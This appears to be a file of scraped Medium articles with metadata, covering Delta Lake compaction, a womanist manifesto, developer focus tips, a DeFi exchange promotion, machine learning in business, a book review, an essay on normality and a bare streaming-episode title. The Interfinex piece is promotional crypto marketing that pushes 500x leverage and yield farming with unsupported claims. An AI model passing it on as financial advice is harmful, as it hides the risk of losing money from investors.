Spark likes file subpart sizes to be a minimum of 128MB for splitting up to 1GB in size, so the target number of partitions for repartition should be calculated based on the total size of the files that are found in the Delta Lake manifest file (which will exclude the tombstoned ones no longer in use).
Databricks Blog: Delta Lake Transaction Log
We found the compression rate of the default snappy codec used in Delta lake, to be about 80% with our data, so we multiply the files sizes by 5 and then divide by 128MB to get the number of partitions to specify for the compaction.
Delta Lake Documentation: Compaction
Once the compaction is completed it is a good time to VACUUM the Delta Lake files, which by default will hard delete any tomb-stoned files that are over one week old.
Delta Lake Documentation: Vacuum
Some Advice
Spectrum DDL
It is important to specify each field in the DDL for spectrum tables and not use “SELECT *”, which would introduce instabilities on schema evolution as Delta Lake is a columnar data store. When the schemas evolved, we found it better to drop and recreate the spectrum tables, rather than altering them.
This is important for any materialized views that might sit over the spectrum tables. If the spectrum tables were not updated to the new schema, they would still remain stable with this method.
Materialized View DDL
As tempting as it is to use “SELECT *” in the DDL for materialized views over spectrum tables, it is better to specify the fields in the DDL. We found it much better to drop and recreate the materialized views if the schema evolved.
If the fields are specified in the DDL of the materialized view, it can continue to be refreshed, albeit without any schema evolution.
This is preferable however to the situation whereby the materialized view might fail on refresh when schemas evolve.
Thank you
Databricks
I would like to thank Databricks for open-sourcing Delta Lake and the rich documentation and support for the open-source community.
AWS
I would like to thank the AWS Redshift Team for their help in delivering materialized view capability for Redshift Spectrum and native integration for Delta Lake.
I would also like to call out Mary Law, Proactive Specialist, Analytics, AWS for her help and support and her deep insights and suggestions with Redshift.
SEEK Enterprise DataOps Team
I would like to thank my fellow Senior Data Engineer Doug Ivey for his partnership in the development of our AWS Batch Serverless Data Processing Platform.
I would also like to call out our team lead, Shane Williams for creating a team and an environment, where achieving flow has been possible even during these testing times and my colleagues Santo Vasile and Jane Crofts for their support.
SEEK is a great place to work ❤️
|
https://medium.com/seek-blog/data-lakehousing-in-aws-7c76577ed88f
|
['George Pongracz']
|
2020-11-23 22:01:47.316000+00:00
|
['Delta Lake', 'Engineering', 'Apache Spark', 'Amazon Redshift', 'Data Lakehouse']
|
thotscholar: a working theory of proheaux (woman)ism [1] [revised 2019] w/blog commentary
|
Photo by Jessica Felicio on Unsplash
bbydollpress.com
Part One: Commentary
I wrote a similar piece, on Medium, that blew up unexpectedly, c. 2016. I didn’t anticipate anyone really reading or quoting it. I had written it off the top of my head. But suddenly, folks were citing my work and ascribing all kinds of things to it. I am a bisexual erotic laborer, writer, and scholar whose work has centered my lived experience and the scholarship of others. Though I do my best to understand and center other groups of people, understandably I will sometimes fail. I likely hold problematic views just like any other human in this world, yet I strive every day to evolve in my theory and practice and to be better today than I was yesterday. Because my online scholarship (and yes, I’m counting Twitter) is limited to my own experiences and focuses on very specific topics, it makes sense that I am rarely caught out of my element. I understand that bothers a great number of people. Trust and believe I am wrong about a lot of things offline and you needn’t worry that I’m perfect or pretending to be. The experiences that I’ve shared and the embarassments I’ve sometimes suffered, prove that I am nowhere near perfect, or claiming to be.
Recently another Black woman made an attempt to discredit my work by claiming that it “centers cishet men.” This woman is a young queer academic and has aspirations of publishing her own work and being cited similarly, so I can understand why she feels competitive and why it must seem like there is not enough room for more than one — academia is notoriously unfriendly to Black women. However, I believe that there is room for all of us and that there are other ways for our work to gain notice, and I do not measure my success in the same way that other people do: awards, lists, accolades. Though these things are nice, I measure myself by my own standards. I have never created work that centered anyone but myself and other multiply marginalized people. Sometimes that includes Black men. Sometimes it doesn’t.
Part Two: The Actual Point
proheauxism 1. Proheaux womanism. Derived from the more colloquial “pro-hoe.” (Spelling altered to reflect difference & refinement[2].) A sex worker womanist, feminist, or hustler-heaux committed to collective and personal justice, not just sexually, but through recognition of labor and physical security. Radically thotty[3], and proud of it. Curious about their sexuality, about birth and rebirth, about challenge and change, about redemption and reparations, about the physical and the emotional. Loves the river in all its incarnations. A pro-sex, pro-pleasure politic that is specifically centered on the multiply marginalized. Might be: marvelous. One who owns oneself and one’s own sexuality or gender expression, regardless of whether or not they are attached to a man or masculine person.
2. A womanist who rejects antiheaux sentiments as well as respectability, racial capitalism, and whore hierarchies. Rejects misogynoir and transmisogynoir — all forms of misogyny, period. Does not accept nor engage in active or passive transphobia, homophobia, colorism, xenophobia, classism, or anti Blackness. Doesn’t juxtapose the erotic and pornography, and recognizes that non-exploitative pleasure comes in varied forms, is not always sex-centered, and is paramount to the human experience. Against all forms of erasure and systemic oppression. Recognizes that solidarity is impossible without acknowledging difference and rejects the urge to homogenize experiences under the guise of inclusivity.
3. Rejection of the idea of one standard of femininity as determined by genitalia (transphobia/intersex erasure and denial). Ecowomanist-minded, in the sense that they are against the environmental racism that plagues black, and brown, and indigenous peoples across the globe due to industrialization, pollution, and redlining which locates hazardous materials in poor, Black, and brown neighborhoods. Committed to the safety of all marginalized peoples. A rejection of phallocentrism (dick-centrism), gender and biological essentialism, racism, cissexism, heterosexism, fatphobia, ageism, ableism, and speciesism — not only in the realm of sexual and pleasure politics, but in all realms. Cares for the environment as a whole, desires to correct the exploitation of all animals, and rejects the notion of human-animal superiority in favor of preserving the ecosystem as a whole. Committed to self, to community, to justice.
4. Commitment to decriminalization and destigmatization of erotic, “vice,” and informal labor. Not just pro-casual sex and pro-promiscuity, but pro-sex work(er). Not simply sex (choice) positive, but pragmatic and communal. Understands the complexities between empowerment and exploitation when residing in an oppressive or imperialist colonized state. Against all forms of racial and genital fetishism. Opposed to the co-option of prison abolitionist language by colonizers and anti-sex work activists. Eschews transgression for the sake of transgression — being “subversive” and securing the ability to “choose under the system” is not inherently revolutionary. Against sexual or body shaming of any kind. Commitment, autonomy, and agency, in particular regard to reproductive/sexual, mental and physical health, including but not limited to access to abortion, antiretroviral drugs, adequate child care, health insurance, and affordable housing. Always centers the multiply marginalized. Isn’t here for supporting multiculturalist white supremacy. Devoted to economic freedom, and critiquing and dismantling capitalism.
5. A hustler, a professional hoe, prostitute, erotic or informal laborer who is producing, living, and surviving sometimes via sexual, sexual-affective, or erotic means. A poor/working class innovator.
— — — — — —
[1] This was originally called “a working definition of proheaux womanism.” I wrote the original off the top of my head and published it on Medium, not thinking that anyone would ever read it. This is a revised version. I changed the title to “a working theory of proheaux womanism,” because I want it to be clear that I appropriated a definitional style and that it is not actually a “definition” in the traditional sense.
[2] Sometime in the mid 2000s or (most likely) even earlier, Black women began spelling words with an — eaux — a “Frenchified” suffix. By “refined” I mean: “precise or exact.” It is exactly “black” slang, though it has been widely appropriated by the masses. I also explored this in a 2018 Twitter thread: https://twitter.com/thotscholar/status/981141389533642752
[3] sexual
Photo by Jessica Felicio on Unsplash
|
https://medium.com/heauxthots/thotscholar-a-working-theory-of-proheaux-woman-ism-1-revised-2019-w-blog-commentary-2775fc27f1a8
|
[]
|
2019-09-09 22:19:21.003000+00:00
|
['Suprihmbe', 'Sex Work', 'Feminism', 'Thotscholar', 'Proheauxism']
|
How to maintain the focus as a software developer?
|
Software development is very challenging. Firstly you have to understand the problems you are solving. Then you need to think of the solution. Depending on the solution, you have to research proper technology. During the process, you need to have a clear perception of the system you are working on and to think longterm. If not any future changes will be hard to pull off.
It’s not enough to be a great engineer to develop and maintain the software. The effort you invest in the process has to be excellent too. I’ve made tons of mistakes only because I’ve lost the focus. So I’ve been looking at different techniques to get faster into the state and to preserve it.
Why do we need to focus?
I believe this is quite obvious, nevertheless, let’s point out a few facts. When you focus, it means you direct attention to only one duty. You make decisions quicker, and you absorb and process information faster. Focus is the first step to get into the flow state. Flow is an optimal state of consciousness, a peak state where we both feel our best and perform our best. It’s hard to get to the state, and if we disrupt it, we need much time to get back, if we get back. That’s why we need to focus intensely on our work so we could perform better.
Have clear goals
Focus here is on the clear, not on the goals.
I’ve seen many developers who think that sprint planning and defining tasks are in some sense, a waste of time. You have to go into the details of every single one; there are discussions about the parts of the software you won’t develop; it’s better to spend time on development because we can make small decisions along the way; assignments seem clear already.
All these reasons are wrong, or the person who is defining the tasks is not doing his/her job adequately. First, you have to have a broader picture of the software, and you never know which feature is waiting for you to maintain. Second, the goal of planning is to save time. If you don’t make all the small decisions, you will have to pause your work either to think of a solution or to ask someone to clarify the problem. Either way, you are losing the focus, and not just that, you are disturbing someone else’s.
If you work in an environment where you don’t have proper product specifications, try to write them out yourself. If the feature you are working on is complicated, split it into chunks. Now you can focus on work not on developing a product. Majority of us are bad multitaskers. We should do only one thing at the time.
Don’t let anything disturb you.
How many times did this situation happen to you?
During the workday, you should have time only for yourself. So there are no questions from other colleagues, no social networking, no fantasy football, or any other distractions.
In that part of the day, my phone is on the silent mode, desktop apps for chatting like Viber or Whatsapp are off. If you are the team lead, I encourage you to make this a team policy so everyone would know not to disturb others and to focus on the job. After this period is over, that’s the time for questions and discussion.
This policy is hard to implement in open space because there are many people and many teams. My former colleague had a great solution. He had some USB lamp, and if it were on, everyone would know not to bother him.
Some people will think this is a selfish approach. I don’t agree. I believe it’s selfish to ask for something that you need a few minutes of analysis or not to wait for a few hours to get an answer. If someone’s dedicated full attention to solving a problem, we should respect that. It maybe feels like he needs only a second to give us the solution, but as I already said, it’s very hard to get into the flow but very easy to get out of it.
Organize code well
Imagine you are writing a new service or control for your app. Everything goes as planned, and the new component is working great. Next step is to integrate it. You open some older class, look at the code, and can’t understand a thing. You don’t want to work anymore. I had a fair share of those situations.
Working with old or other people’s code can be very frustrating. You can avoid the problem using coding standards. When code is clean, organized, easy to read, understand, and navigate, or as we call it beautiful, you won’t lose much time searching for the parts you need. Also, understanding the code is more comfortable. Therefore it’s easier to maintain the focus.
Organized code has other advantages too. I have already written about it. Check it out.
Organize your tasks
During the sprint, you probably get several tasks. Firstly you have to prioritize what’s essential and make sure you can deliver it on time. Afterward, you have the flexibility to arrange others as you prefer. Some tasks are challenging, some relaxing and some just boring. Don’t do all the enjoyable stuff and leave the dull for the end. No matter how exciting the job is, the quality of the code has to be identical.
Focus, and particularly the flow state, are very expensive. They take much energy from us, and we need to regenerate. So if you have more than one fun task in the sprint, after you finish first, next one should be dull one or relaxing one. You don’t want to overload your brain and burn out.
If you leave all boring ones for the end of the sprint, you won’t have enough energy, desire to complete all of them. I like to leave the relaxing ones for the end of the week, so I don’t get exhausted before the weekend.
To get a maximum of yourself, you have to understand all responsibilities and to know your ability. If you are too ambitious, you’ll burn out. If you are too relaxed, you’ll stagnate. So, be cautious with the organization of your tasks.
Struggle well
There are occasions when there are no fun tasks in a plain sight. Everything we get is either dull or well above our skill level. Even if we use all pieces of information above, it’s hard to focus and be as productive as you can be. Sometimes coding is a stressful process, and effort we need to invest is enormous. Unfortunately, there is no practical advice that can help us. We have to struggle well.
Stop perceiving struggle as something negative. The struggle is a test of character and creativity. In those moments, to keep myself motivated, I repeat that there is no avoiding pain, especially if you’re going after ambitious goals. Eventually, you’ll have a breakthrough, and those responsibilities won’t look so difficult anymore.
The last point I want to add is about perception. A few days ago, there was a discussion about the article I wrote on Twitter, and some guy said that creating a modular app is hard. My response was that it’s not hard; it’s challenging. Having that positive mindset help you to overcome many obstacles and get into a productive state.
Conclusion
To focus and to get into a flow state can be very difficult. However, we should do our best to get int those state. Then we learn faster, make better decisions, and solve problems quicker. Software development is quite challenging, and competition is enormous. We should use any tool or method to be as productive as we can so we can stay relevant in the industry.
Want to find out more?
Or you want to discuss swift and technology? Follow me on Twitter. You’ll find additional content, reading recommendations, and much more.
|
https://medium.com/flawless-app-stories/how-to-maintain-the-focus-as-a-software-developer-d43aeb25693c
|
['Pavle Pesic']
|
2019-08-07 09:48:48.767000+00:00
|
['iOS', 'Mobile', 'Mobile App Development', 'Swift', 'iOS App Development']
|
New England’s Series A Deals — Part I
|
Recently, The Buzz profiled the a number of market maps on the New England Venture/Startup Ecosystem including the following:
These market maps continue to be very positively received by our subscribers so we’re continuing to deliver. In a continuation of our earlier series on New England Seed Deals, we’re now covering New England Series A deals for companies since 2018. [NOTE: This will be a series of market maps]. Here’s the list:
|
https://medium.com/the-startup-buzz/new-englands-series-a-deals-part-i-8c513c552c8
|
['Matt Snow']
|
2020-10-27 19:02:42.444000+00:00
|
['Business', 'Fundraising', 'Venture Capital', 'Technology', 'Startup']
|
Interfinex — simple and innovative way to swap any ERC20 token into another and pay a negligible fee on all trades
|
Interfinex — simple and innovative way to swap any ERC20 token into another and pay a negligible fee on all trades Victor Osibajo Dec 6, 2020·4 min read
The fate of cryptocurrency exchanges appears to be moving towards decentralized exchanges gradually and it is suggested that it might replace the centralized exchanges one day based on the belief of the crypto family. The daily and monthly trading volume of one of the decentralized exchanged uniswap has exceeded one of the popular pioneers centralized exchanges Coinbase Pro since September year 2020 and still maintaining the momentum.
One major shortcoming about the centralized exchanges is that once they take away your coin’s custody, you are no longer in control and remember the popular saying, not your key, not your money and once a hacker gets hold of the private key to any exchange or able to hack there way into the administrative privilege, they can wipe out users’ funds. Billions of dollars have been lost since the inception of blockchain revolution through this medium. Other areas are as enumerated below:
Insecurity: Due to the nature of centralized control, there is a high risk of fund loss and thefts since they are custodial of users’ funds.
Due to the nature of centralized control, there is a high risk of fund loss and thefts since they are custodial of users’ funds. High risk: market manipulation, latency problem and other problems when it comes to dealing with large volumes are characterized as a deficiency to centralized exchanges.
market manipulation, latency problem and other problems when it comes to dealing with large volumes are characterized as a deficiency to centralized exchanges. Lack of transparency: Centralized exchanges can perform illegal activities such as front-run orders, volume manipulation and liquidate users based on the orders submitted.
The Decentralized Exchange
The decentralized exchanges are designing the real future of cryptocurrencies platforms and they aim to tackle the problems that impede centralized structures by building a peer to peer marketplace that give privilege to users to be custodial of their assets which makes it to be trustless where security and privacy are well preserved.
InterFinex Approach
With Interfinex — you can convert any ERC20 token into any other ERC20 token and pay a fee of 0.1% on all trades — Or provide a referral and receive a 51% discount (0.049% fee). Not only that, you can deposit an equivalent amount of ERC20 tokens into the pool and start yield farming. The amount you earn will be dependent on the fees paid and the amount of liquidity deposited. Earn ERC20 tokens and Interfinex Bill tokens in every liquidity pool. It does not end there when we say it is simple and convenient, that is what it is. In continuation, 10% of the trading fees will be converted to Interfinex Bills and paid out to Liquidity Providers. In addition to this, 80% of the fees will be paid out in the ERC20 token that was sold during the trade.
Recently, the Interfinex team have introduced a 500x leveraged margin on their platform. It is very simple to use, all that is required to do is to enter the amount and drag the slider to the number of leverage the user intends to use. Close of positions is just at a tap of the button, all users have to do is to tap on the “Close long position” or “Close short position” button and the position will be closed. Any profits acquired will automatically be transferred to the user’s account.
The team as part of the token distribution is introducing yield farming to support the pool on the platform. This is the right time as 30% of the supply will be distributed via yield farming over the next 6 months, the time is ticking. All that is necessary to do is to deposit some liquidity into one of the supported pools. After this has been done, you will automatically start earning yield. The reward is dependent on the amount you deposit relative to the pool size.
The APR of your favorite pool is accessible via the blue card above or on the yield farming page as shown below:
Interfinex distribution strategies are listed below
30% of tokens will go for exchanges.
10% will be channeled towards marketing,
30% will be used as community incentives,
20% was allocated for team members
The remaining 10% is reserved for founders.
There are more to Interfinex and other details are obtainable via any of these links
#ETF #Ethereum #bitcoin #eth #uniswap #defi #gem #investing #altcoins #exchange #money #cryptocurrency #trading #investment #decentralized.
|
https://medium.com/@victorosibajo/interfinex-simple-and-innovative-way-to-swap-any-erc20-token-into-another-and-pay-a-negligible-3c49654566fd
|
['Victor Osibajo']
|
2020-12-06 22:40:53.269000+00:00
|
['Defi', 'Interfinex', 'Swap', 'Eth']
|
Make Machine Learning Work for Your Company: An Overview
|
“Machine learning” is hot. Apple is “building a machine learning system to rule them all.” YouTube uses machine learning to remove objectionable content, while telecom empires apply ML algorithms for predictive maintenance and improving network reliability. And, of course, there are plenty of TedTalks.
For all the hype around machine learning, it still seems like a distant and futuristic concept for many in their everyday work lives. However, this technology — which is defined as a computer learning from experience to improve at a task without explicit programming — can be implemented at your company today regardless of size or industry. The underlying thread of ML for business is the potential to help companies operate more efficiently and competitively.
To illustrate this potential, here’s a brief overview of applications:
Marketing
The discipline has always been a bit of an art, but machine learning can elevate your creative intuition with a strong scientific foundation. Marketers are already using machine learning to target the right audience at the best time, test different combinations of copy in real-time, and personalize landing pages with optimal product and pricing.
Human Resources
In the knowledge economy, finding and retaining the best employees is more important than ever. Fortunately, machine learning can help. Algorithms can be used to remove bias from the hiring process, rank resumes, and identify candidates similar to your most successful employees. It can create custom experiences that attract applicants, automate feedback throughout the hiring process, and even answer candidate questions in real-time. Post-hire, machine learning enables employers to identify which of their employees are most likely to turnover creating an opportunity to intervene. Here’s an interesting case study on how Blue Orange uses ML to solve problems across the hiring process.
Customer Service
You’ve probably already experienced machine learning applied to customer service — in the form of chatbots. While not all chatbots incorporate machine learning, the ones that do can identify when it’s appropriate to use specific responses, gather required information, and escalate to a human agent. Additionally, natural language processing helps human agents quickly find answers that are buried in heavy text. These applications fundamentally increase customer service speed and customer satisfaction.
Fraud Prevention and Detection
Increasingly sophisticated fraud attempts, aided and abetted by new technology, call for increasingly sophisticated fraud prevention and detection. Machine learning’s anomaly detection capabilities make it well suited not only for recognizing old patterns of fraudulent activity, but also detecting new types of activity as they emerge. The resulting reduction in chargeback levels is especially valuable for e-commerce businesses.
Cyber Security
Likewise, the constant evolution of cyber-attacks renders machine learning an important tool for cyber defense. Because it does not rely on past attack data as much as conventional approaches, machine learning is able to keep pace with hackers and more accurately predict cyber threats. Additionally, the sheer volume of cyber attacks makes machine learning an important tool for managing staffing expenses.
In Summary
Machine learning is already an indispensable tool for many industries. If ML is the future of business, then the future is here.
Here’s a helpful framework for understanding machine learning: https://blueorange.digital/machine-learning-an-introduction/
If you want to dig in on specific applications for your business, feel free to reach out to us today.
|
https://medium.com/@BlueOrangeDigital/make-machine-learning-work-for-your-company-an-overview-bf98d2764a07
|
['Blue Orange Digital']
|
2020-02-07 14:12:27.474000+00:00
|
['Predictive Analytics', 'Data Engineering', 'Data Science', 'Cybersecurity', 'Machine Learning']
|
Mostly Useful, a Bit Misleading: A Review of Nathan Robinson’s Why You Should Be a Socialist
|
First published online at NyJournalofbooks.com here.
There are only a few introductory texts on socialism that manage to be accessible, witty, and broad enough to survey its history as well as contemporary thought on the subject. Nathan J. Robinson’s new book, Why You Should Be a Socialist, is able to do just that by weaving together a compelling narrative and excellent arguments that cover the rich practical and theoretical implications of socialism in a down to earth, entertaining way. There are serious holes in the book’s content with regards to theory, however, as well as a reluctance to demonstrate if contemporary “democratic socialism” is up to the task of revolution. On the whole, the text provides many convincing arguments to win over skeptical progressives, centrists, and even conservative readers who perhaps have never deeply considered the case for socialism.
Robinson begins the book by addressing the fundamental impulses that socialists share: revulsion at gross inequalities and inhumane conditions that are the direct consequences of our dominant socio-economic system, capitalism. This is where Robinson’s work truly shines. He is able to clearly show how socialist or least anti-capitalist thought is permeated by the notion that mainstream politics and finance are anything but normal in regards to human decency and meeting basic needs. What socialism contends, and what Robinson easily and deftly spells out, is that our economic system is not simply unfair or “the way things have to be”. Rather, capitalist institutions are set up to perpetuate systemic injustices including mass poverty, institutional racism, and imperial wars and foreign conflicts.
Part One of the book (Chapters one through three) dives into the failures of capitalism in detail, and the author cites many common studies and figures which bolster the arguments for socialism. What Robinson hits on over and over, to his credit, is to explain how completely arbitrary and cruel contemporary capitalism is. It is important to note that socialist thinking does not have to come from theoretical teachings or ideology. Instead, innate curiosity and what Robinson calls a “moral instinct” provides the natural tendency which grounds socialist thought. Here we can see clear articulations as to how and why capital relies on human immiseration for continual self-expansion, and how it chooses profits over people time and time again. This section does have convincing arguments to persuade open-minded liberals and skeptics.
Part Two dives into defining principles and terms associated with the left tradition, as well as expanding on modern utopian ideals and pragmatic agendas that socialists of today advocate for. At its core, socialism is about expanding democratic values and empowering workers, and Robinson’s analysis reflects this. Yet he seems to continually pepper his own belief system with the common qualifiers such as “libertarian socialist” and “democratic socialist.” Robinson also errs by unduly misrepresenting Marx and Lenin, even throwing in a baseless quote from Murray Bookchin about Marx as if to prove his point. A few pages later, Robinson is quick to cite Hellen Keller’s importance to American socialism, and rightly so; yet this reviewer is left to wonder if he is aware that Keller repeatedly praised Lenin throughout her life.
Part Three demolishes the usual conservative and liberal arguments and opposition to socialism. It’s quite an entertaining read and Robinson deftly dismisses both the intellectual bankruptcy of conservatism and the inadequate wishy-washiness of liberal thought. The section “Response to Criticisms” also does a good job explaining the bad faith mainstream critics use in lame attempts to discredit socialist thought. There is one notable exception, however, in which the author seriously errs in his attempt to bolster his argument by relying on discredited propaganda.
Robinson tries to explain how the capitalists’ talking point: “if you want socialism you’ll end up with Venezuela” is an absolute canard. Capitalists love to point to economic hardships in the developing world as being caused by socialism no matter what, obviously.
What’s bewildering, however, is the author’s insistence that Venezuela cannot be an example of socialist failure because in fact Venezuela does not have socialist policies. Amazingly, Robinson repeats mainstream lies and distortions, and attributes the crisis almost solely to internal “poor economic policies”, “authoritarian government”, and a “corrupt kleptocracy”. This is an uneducated viewpoint, one that does not take into account the worldwide drop in oil prices which hurt the spending power of the government; the sanctions, covert action, and economic sabotage from the US; and purposeful withholding of household goods and supplies by Venezuelan corporations and oligarchs who support the US-backed opposition. This is a prime example of what some humorously refer to as “State Department Socialism”, and was cringe-inducing to read. There are only three types of people who cite the Wall Street Journal and the Washington Post as credible sources on Venezuela: the educated fool, the sycophantic quisling, or the total sociopath; and Robinson appears to fall into the first category in this instance.
As founder and editor of Current Affairs, the leftist/progressive website and magazine, Robinson’s ideas are passed around the admittedly tiny socialist community and this book cannot be disentangled from his wider media footprint. Current Affairs does have some good content for socialists and younger “baby leftists”, and poses itself as more down-to-earth and irreverent compared to venues like Dissent or Jacobin.
Robinson is even maligned online, perhaps a bit unfairly, for his (possibly?) affected accent and his fashion sense; in his book he correctly identifies these sorts of criticisms as liberal tendencies. In his section on the inadequacy of liberals, he describes the way a “politics of attributes” is invoked, which is a good way of summing up the superficiality of liberal identity politics and woke political correctness. The ranks of lefties and socialists have a long, proud tradition of being filled with eccentrics, after all.
More to the point, valid critiques of this work as well as the wider milieu of Current Affairs and the above mentioned outlets focus around immature and indecisive ideology and policy proposals. Robinson’s own brand of libertarian socialism in the book is never really developed or expanded upon, and he does not bother to delve in and explain how he reconciles his own beliefs with democratic socialism. His passing references to Marx are, frankly, embarrassing, as even Jacobin’s review noted. The paucity of references to leftist movements internationally and in developing nations is a problem. The criticisms of Venezuela are unfounded; he attempts to attack from the left but uses mainstream arguments and sources from the Wall Street Journal, for crying out loud.
This book reflects a lot of tendencies of younger democratic socialists and millennial left politics. It’s immature, brilliant, clumsy, utopian, sentimental, geeky in an endearing way, out of touch, starry-eyed, short on history. It’s at turns sprawling and ambitious; it’s also characteristically insular and, again, mostly bereft of historical materialism and internationalist influences. Like the wider projects of the Democratic Socialists of America (DSA), Robinson’s own work elides the issue of his own privilege and how it is being leveraged to network and strengthen the “pragmatic” opportunism of socialists and social democrats trying to work within the inherently corrupt Democratic Party.
The text does exhibit some elements of salesmanship that can be at different points irritable or likeable, with a witty joke here, a silly pop culture reference there. In spite of the laid back prose, there is a sort of striving, overachieving tone. It does appear that the author wants to be seen as a very serious person: see Current Affairs’ interviews with very important people, rock stars of US “progressivism” such as Noam Chomsky, Ilhan Omar, Naomi Klein, but no one, well, too subversive. The bio in the book jacket (“Robinson is a leading voice of millennial left politics”) even mimics Jacobin’s byline: “Jacobin is a leading voice of the American left”. For those being introduced to leftist thinking, the book does a good job explaining some of the moral and practical reasons in favor of socialism. Those already steeped in theory and practice will find much familiar ground covered, as well as having to deal with the frustration of imprecise and immature reasoning from a self-proclaimed “leading voice.”
|
https://medium.com/politics-fast-and-slow/mostly-useful-a-bit-misleading-a-review-of-nathan-robinsons-why-you-should-be-a-socialist-9505087b579b
|
['William Hawes']
|
2020-07-11 17:08:44.190000+00:00
|
['Politics', 'Socialism', 'Communism', 'Culture', 'Government']
|
Blog of the month at ENVIE Magazine
|
I am happy to announce that Aisha’s Writing Corner has been selected as the Blog of the Month in Envie! magazine 🥳
I am greatly honored that my blog was featured. You can find my interview with lovely Anna Page in the November issue at enviemagazine.com. You can subscribe to the great newsletter for free. It features up and coming Indie authors and their works.
When I started my blog, early this year, I had no idea that it will reach this far and I will have so many lovely followers. Thank you for reading my blog posts. I hope to write more about art, movies, animations and books that are inspiring. I hope that you discover something new from my blog posts.
Thank you for dropping by! 😊
Published by Aisha Urooj
I live in Toronto, Ontario. I love living in my multicultural city. My hobbies include writing, reading, painting and photography. I adore classic books and hope to someday emulate the books that I love and cherish. View more posts
|
https://medium.com/@aisha-urooj/blog-of-the-month-at-envie-magazine-5006c2a8d75c
|
['Aisha Urooj']
|
2020-12-20 22:38:24.487000+00:00
|
['Blogger', 'Blogging', 'Writing', 'Blog', 'Authors']
|
How to be Normal
|
How to be Normal
Considerations about the quest of a normal life
I once knew a woman whose highest aspiration was to be a normal person — At least, so she claimed.
Whenever someone uses the word “normal” in a conversation, I wonder what exactly they are trying to say. For a long time, I believed that others had a life manual that, for some reason, had not been delivered to me. One of the more substantial chapters of this manual should cover what is normal and what’s not.
— It means to be like everyone else. She said.
Here’s another generic concept: everyone else. It includes the Pope, the pusher in the neighborhood park, the victims of violence, the murderers, Donald Trump, Joe Biden, Kim Jong-un, Bill Gates, Gioacchino Difazio, the children forced to work, the stranger whose gaze we met in the subway, the beggar on the street corner, the astronaut in the space station, to list a few.
If being normal means having something in common with everyone else, it simply means belonging to the humankind.
The aspiring “normal person” I am talking about was a colleague of mine, until a few years ago. She did not make an in-depth analysis of her thinking on this theme. Her idea of normality consisted — as far as I knew — in being a passionate spectator of X-Factor, in buying clothing and accessories online with a reasonable frequency, in sharing the lunch break always with the same people, and in some trips to the toilets.
All in all, hers might seem a naive and harmless ambition…
Up close, nobody is normal
Franco Basaglia was a famous Italian psychiatrist who revolutionized the approach of psychiatric care.
One sentence sums up his thought: seen up close, nobody is normal.
No one can claim to have perfect mental health. Therefore, it made no sense to intern the mentally ill in asylums. Instead, it’s necessary to reintegrate them into society through a path that puts the person’s dignity first. Thanks to him, asylums in Italy were closed, and the mentally ill were no longer considered dangerous and irrecoverable beings to be imprisoned and punished.
Seen up close, nobody is normal. This was also true of my dear colleague, who, observed a little more closely, showed aspects that appeared not at all normal or innocuous.
She demonstrated an exceptional ability to gaslight people who had the misfortune of being between her and her goals. Is this normal behavior? Perhaps, for an a-hole.
Many people lost their jobs because of her.
Was she aware of it? Of course, she was, but that was normal for her. There was this work to be done, and she was the one who had to do it. So she was ordered. Otherwise, she would have been the one to lose her job.
The trouble with Eichmann was precisely that so many were like him, and that the many were neither perverted nor sadistic, that they were, and still are, terribly and terrifyingly normal. From the viewpoint of our legal institutions and of our moral standards of judgment, this normality was much more terrifying than all the atrocities put together.
― Hannah Arendt, Eichmann in Jerusalem: A Report on the Banality of Evil
Normality can be dangerous
Attempting an accurate definition of normality would take me far beyond the scope of this article. By common sense, with a little help from statistics, we can consider a normal behavior one that is carried out by the majority of people in a society. This is also known as “conformism.”
Conformism is extremely helpful to certain categories of people:
Advertisers design their campaigns based on common beliefs and behaviors, thus being sure to hit the greatest possible number of people belonging to their target. Often advertisers contribute to broadening the concept of normality, to increase the chances of selling a product. Politicians (ok, some politicians) build their consensus on the concept of normality. Some politicians (the worst) point the finger at those they consider “different” to strengthen their voters' sense of belonging to a community. Dictators and tyrants: They decide what is normal and what is not. From Hitler down, unfortunately, there is no lack of examples. Big Pharma: some diseases are more “normal” than others. Knowing that a condition is widespread makes it very convenient to produce (and sell) a cure. Conversely, rare diseases are those that generally have fewer dedicated drugs. TV show producers need the largest possible audience to sell advertising, product placements, and sponsorships at a high price. Which audience is larger than the ocean of ordinary people? Employers: being normal is expensive. Normal people need a job to lead a normal life, paying a normal mortgage for a normal house, getting into debt for a normal car, and creating a normal future for their children. And in the meantime, maybe, help the employer get rid of unwanted (abnormal, for any reason) employees.
You can complete this list.
As you can see, there are many vultures up there in the sky circling the heads of the so-called normal people.
Without normal people, these creatures would die of starvation.
The point is: uncritically following what is considered normal put yourself in a weak position.
Wanting a normal life means accepting a definition of normality imposed from the outside. You don’t control it, you adhere. Everybody does it, so I do it too.
You delegate your thought to an abstract entity, which does not exist: everybody.
Unfortunately, in doing so, you give up a part of yourself. A significant part. Perhaps the most important. Perhaps so important that we could say: you give up on yourself.
Giving up on yourself, what happiness do you think you can aspire to? Perhaps the same kind of happiness that can be found in drugs or alcohol. But in this case, no one will try to save you, because you are sinking into normal happiness.
Perhaps it’s now clearer (even to myself) why I’m terrified by people who call themselves “normal.”
Being normal is dangerous.
Normality and awareness
Yet a part of me believes that there is nothing wrong with living according to beliefs and behaviors shared by others.
Being part of a group makes us feel at home and gives us the necessary serenity to progress in other fields, such as art or music, or raise a family.
There is nothing wrong. Provided, however, that the choice is made with awareness.
Here, this is the magic word: awareness.
One of the most precious gifts I have had from life was precisely this: the realization (at some point ) that most people who believe they are normal don’t really know what they are talking about.
And this is also true for my monstrously normal colleague. Whom I don't hate. Indeed I have to thank her: the clash with its normality allowed me to embark on a new path, much richer in humanity and gratifications.
I know I’m not saying anything new or particularly original. But I feel that if I hadn’t written these words, just today, I would have slipped into a dangerous apathy, which is the cradle of the worst normality.
I suspect I’m not the only one hoping to find a life-time user manual ready to use, but I thank the god of mail carriers for never having received it, as that forced me to write my own.
Write the manual
Every day I write a page of the user manual of my life. Sometimes I have to rewrite it the next day. Other times it works flawlessly for a long time.
I don’t know if it will be useful to anyone besides me. Maybe it could be an inspiration, as other people’s ideas are to me.
Discovering that the manual does not exist can be scary. This is why some take refuge in the hazy concept of normality that I have written about so far.
But if you start writing your manual with an act of true courage, I assure you that you will discover wonderful things about yourself and the world.
I hope you start this journey soon.
|
https://medium.com/gmeditations/how-to-be-normal-669b239fff71
|
['Gioacchino Difazio']
|
2020-11-12 08:35:23.972000+00:00
|
['Normal', 'Personal Development', 'Life Lessons', 'Personal Story', 'Normality']
|
Criminal Justice [S02E01] Series. 2 Episode. 1 — Stream.
|
